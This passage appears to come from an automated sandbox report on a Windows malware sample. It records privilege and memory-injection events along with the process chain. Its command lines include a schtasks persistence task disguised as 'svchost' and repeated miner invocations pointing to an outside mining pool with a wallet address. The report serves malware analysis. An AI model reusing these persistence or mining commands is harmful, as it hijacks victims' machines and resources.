| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\pureee.exe | N/A |

Suspicious use of AdjustPrivilegeToken

| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\adada.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A (×4)
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (×25)
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A (×17)
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A (×17)

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A (×4)
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A (×24)
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A (×16)
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A (×20)

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\1000029002\a2f7c1badc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4788 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe (×3)
PID 3116 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\Admin\AppData\Local\Temp\1000020001\471a98aee8.exe (×3)
PID 1492 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\1000020001\471a98aee8.exe C:\Windows\system32\cmd.exe (×2)
PID 4860 wrote to memory of 2348 N/A C:\Windows\system32\cmd.exe C:\Program Files\Google\Chrome\Application\chrome.exe (×2)
PID 4860 wrote to memory of 848 N/A C:\Windows\system32\cmd.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (×2)
PID 4860 wrote to memory of 5064 N/A C:\Windows\system32\cmd.exe C:\Program Files\Mozilla Firefox\firefox.exe (×2)
PID 2348 wrote to memory of 752 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe (×2)
PID 848 wrote to memory of 4648 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (×2)
PID 5064 wrote to memory of 1056 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe (×11)
PID 1056 wrote to memory of 876 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe (×35)

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe

"C:\Users\Admin\AppData\Local\Temp\0d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4.exe"

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

C:\Users\Admin\AppData\Local\Temp\1000020001\471a98aee8.exe

"C:\Users\Admin\AppData\Local\Temp\1000020001\471a98aee8.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C37F.tmp\C380.tmp\C381.bat C:\Users\Admin\AppData\Local\Temp\1000020001\471a98aee8.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.106 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffebe23cc40,0x7ffebe23cc4c,0x7ffebe23cc58

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffebe0f46f8,0x7ffebe0f4708,0x7ffebe0f4718

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1980 -parentBuildID 20240401114208 -prefsHandle 1888 -prefMapHandle 1880 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {53e5f022-890f-4641-bc25-6435b881c0a7} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" gpu

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1944,i,8199306318284248444,9025721501852979593,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=1940 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2168,i,8199306318284248444,9025721501852979593,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=2192 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,8199306318284248444,9025721501852979593,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=2600 /prefetch:8

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2392 -parentBuildID 20240401114208 -prefsHandle 2448 -prefMapHandle 2444 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4bbd761e-7204-4378-bc7c-64570d4434fc} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" socket

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:8

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3276 -childID 1 -isForBrowser -prefsHandle 3292 -prefMapHandle 3188 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0fc26526-eabd-4dc7-9f61-97d1368d5d9a} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" tab

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3540 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3756 -childID 2 -isForBrowser -prefsHandle 2880 -prefMapHandle 3200 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {328eb413-cf5c-4040-baf6-6352daf96de4} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4620 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4612 -prefMapHandle 4608 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {367c94ec-d0da-40e9-881f-6a57780e030e} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" utility

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,9315870064783897743,3894212314872755150,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,8199306318284248444,9025721501852979593,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=3172 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3116,i,8199306318284248444,9025721501852979593,262144 --variations-seed-version=20240730-050116.493000 --mojo-platform-channel-handle=3196 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5492 -childID 3 -isForBrowser -prefsHandle 5484 -prefMapHandle 5480 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {56b2e0f3-cc98-4896-8892-5958027b8893} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5612 -childID 4 -isForBrowser -prefsHandle 5372 -prefMapHandle 5620 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ddc51cbc-d576-46b5-9838-d03e866fba5b} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5880 -childID 5 -isForBrowser -prefsHandle 5800 -prefMapHandle 5804 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1140 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {aa4773f0-857f-4bd6-84d5-12fdc287b3fc} 1056 "\\.\pipe\gecko-crash-server-pipe.1056" tab

C:\Users\Admin\1000029002\a2f7c1badc.exe

"C:\Users\Admin\1000029002\a2f7c1badc.exe"

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe

"C:\Users\Admin\AppData\Local\Temp\1000030001\879432f808.exe"

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"

C:\Users\Admin\AppData\Local\Temp\1000056001\deepweb.exe

"C:\Users\Admin\AppData\Local\Temp\1000056001\deepweb.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5692 -ip 5692

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5692 -s 1096

C:\Users\Admin\AppData\Local\Temp\pureee.exe

"C:\Users\Admin\AppData\Local\Temp\pureee.exe"

C:\Users\Admin\AppData\Local\Temp\adada.exe

"C:\Users\Admin\AppData\Local\Temp\adada.exe"

C:\Users\Admin\AppData\Local\Temp\dropperrr.exe

"C:\Users\Admin\AppData\Local\Temp\dropperrr.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svchost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe" /rl HIGHEST /f

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 -a rx -k -u ETC:0x612e5dBaff1fa2Be8D30e5684630c26db5c5196B.RIG_CPU -p x --cpu-max-threads-hint=50

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe

